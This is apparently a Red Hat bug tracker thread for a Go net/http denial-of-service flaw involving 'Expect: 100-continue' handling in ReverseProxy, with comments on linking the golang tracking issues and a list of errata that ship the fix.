The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail. An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.
Created golang tracking bugs for this issue: Affects: fedora-all [bug 2297318]
There is something wrong with this CVE tracker bug. The CVE is in Go's standard net/http package, which is part of the golang RPM. However, I don't see any mention of golang here. I also don't see any mention of prominent RPMs that use Go and might need to rebuilt against a golang, where the CVE is fixed. eg., podman and toolbox. However, I do know about the existence of two toolbox Jira issues that were filed for this CVE: https://issues.redhat.com/browse/RHEL-47194 https://issues.redhat.com/browse/RHEL-47199 So, it seems like something went wrong where this tracker bug doesn't depend on all the corresponding child issues and bugs. This isn't just an academic problem, because I use this metadata to figure out the corresponding golang issues to know when the CVE would get fixed in golang, so that builds can be done against it.
(In reply to Debarshi Ray from comment #12) > There is something wrong with this CVE tracker bug. > > The CVE is in Go's standard net/http package, which is part of the golang > RPM. However, I don't see any mention of golang here. I also don't see any > mention of prominent RPMs that use Go and might need to rebuilt against a > golang, where the CVE is fixed. eg., podman and toolbox. However, I do > know about the existence of two toolbox Jira issues that were filed for this > CVE: > https://issues.redhat.com/browse/RHEL-47194 > https://issues.redhat.com/browse/RHEL-47199 I did some digging, and the corresponding golang bugs are: https://issues.redhat.com/browse/RHEL-47200 https://issues.redhat.com/browse/RHEL-47161
This issue has been addressed in the following products: Cryostat 3 on RHEL 8 Via RHSA-2024:5537 https://access.redhat.com/errata/RHSA-2024:5537
This issue has been addressed in the following products: Cost Management for RHEL 8 Via RHSA-2024:6462 https://access.redhat.com/errata/RHSA-2024:6462
This issue has been addressed in the following products: Red Hat Enterprise Linux 9.2 Extended Update Support Via RHSA-2024:6914 https://access.redhat.com/errata/RHSA-2024:6914
This issue has been addressed in the following products: Red Hat Enterprise Linux 8 Via RHSA-2024:6908 https://access.redhat.com/errata/RHSA-2024:6908
This issue has been addressed in the following products: Red Hat Enterprise Linux 9 Via RHSA-2024:6913 https://access.redhat.com/errata/RHSA-2024:6913
This issue has been addressed in the following products: Red Hat Enterprise Linux 8.8 Extended Update Support Via RHSA-2024:6912 https://access.redhat.com/errata/RHSA-2024:6912
This issue has been addressed in the following products: Red Hat Enterprise Linux 8 Via RHSA-2024:6969 https://access.redhat.com/errata/RHSA-2024:6969
This issue has been addressed in the following products: NETWORK-OBSERVABILITY-1.6.0-RHEL-9 Via RHSA-2024:7074 https://access.redhat.com/errata/RHSA-2024:7074
This issue has been addressed in the following products: OpenShift Custom Metrics Autoscaler 2 Via RHSA-2024:7348 https://access.redhat.com/errata/RHSA-2024:7348
This issue has been addressed in the following products: Red Hat Enterprise Linux 8 Via RHSA-2024:7349 https://access.redhat.com/errata/RHSA-2024:7349